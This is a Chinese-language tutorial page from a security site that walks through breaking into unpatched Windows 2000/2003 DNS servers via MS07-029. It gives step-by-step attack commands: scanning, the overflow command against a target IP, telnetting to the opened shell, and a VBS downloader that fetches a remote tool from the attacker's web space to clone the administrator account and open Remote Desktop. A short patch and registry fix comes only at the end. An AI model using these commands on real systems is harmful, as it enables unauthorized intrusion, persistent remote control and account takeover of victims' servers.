专业网站运营平台
首页 网络安全 入侵防御 正文
我要投稿

MS07-029漏洞利用入侵过程

入侵防御
2023-12-04 0 1,008

前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:
MS07-029漏洞利用入侵过程500)this.width=500\” title=\”点击这里用新窗口浏览图片\” />
这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!
先用它来对主机进行扫描:
在我们的命令行下输入:“dns –s 目标IP地址”
MS07-029漏洞利用入侵过程500)this.width=500\” title=\”点击这里用新窗口浏览图片\” />
稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,
如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。
MS07-029漏洞利用入侵过程500)this.width=500\” title=\”点击这里用新窗口浏览图片\” />
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100
MS07-029漏洞利用入侵过程500)this.width=500\” title=\”点击这里用新窗口浏览图片\” />
我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389,
在命令行里输入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >> tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs
大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs
然后把开3389的工具上传到你的个人空间,
我这里用的是火狐开3389的工具,在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:\\wrsky.exe
MS07-029漏洞利用入侵过程500)this.width=500\” title=\”点击这里用新窗口浏览图片\” />
“wrsky.exe -c”可以克隆当前管理员帐号
再输入“c:\\wrsky.exe -o 3551”
500)this.width=500\” title=\”点击这里用新窗口浏览图片\” />

意思就是打开对方的远程桌面服务,并且使用3551端口。
用“wrsky.exe -k”可以检查3389是否开启,开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。
在运行里输入"mstsc",登陆上去。
MS07-029漏洞利用入侵过程500)this.width=500\” title=\”点击这里用新窗口浏览图片\” />
那熟悉而又亲切的画面出现在我们面前了。
如果是2K的系统,还有一个更加傻瓜化的工具open3389,直接运行就可以了,不需要任何参数,不过对方电脑会马上重启。
另外我还放了其他两个DNS利用工具和一篇ZWELL的精华文章在光盘里,有兴趣的朋友可以自己研究。
这个漏洞的危害是是分巨大的,目前利用DNS服务RPC漏洞传播的蠕虫病毒VanBot已经出现,变种已经开始疯狂传播。
WIN 2K或2003的朋友请赶快下载补丁
http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx
或者打开记事本,输入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters]
"RpcProtocol"=dword:00000004
保存为扩展名为 .REG 的文件,双击导入,再重新启动 DNS 服务即可。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 入侵防御 MS07-029漏洞利用入侵过程 https://www.u-9.cn/security/fangyu/72632.html

MS07-029漏洞利用入侵过程
上一篇: 入侵RedHat Linux系统实例
下一篇: 入侵土耳其网站实例
常见问题

相关文章

什么是CC攻击 判断网站是否被CC攻击并且如何防御CC攻击
什么是CC攻击 判断网站是否被CC攻击并且如何防御CC攻击
入侵防御
2个月前 566
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
入侵防御
5个月前 1,094
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
入侵防御
5个月前 339
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
入侵防御
5个月前 1,001
猜你喜欢
发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

联系官方团队 在线提交工单
TA的动态
总裁主题

分享最新WordPress教程共同学习,共同进步,共同成长!

QQ交流群
悠久资源

QQ交流群

您的支持,是我们最大的动力!
热门文章
热门评论
终身VIP会员限时钜惠
首页 首页 菜单 首页 首页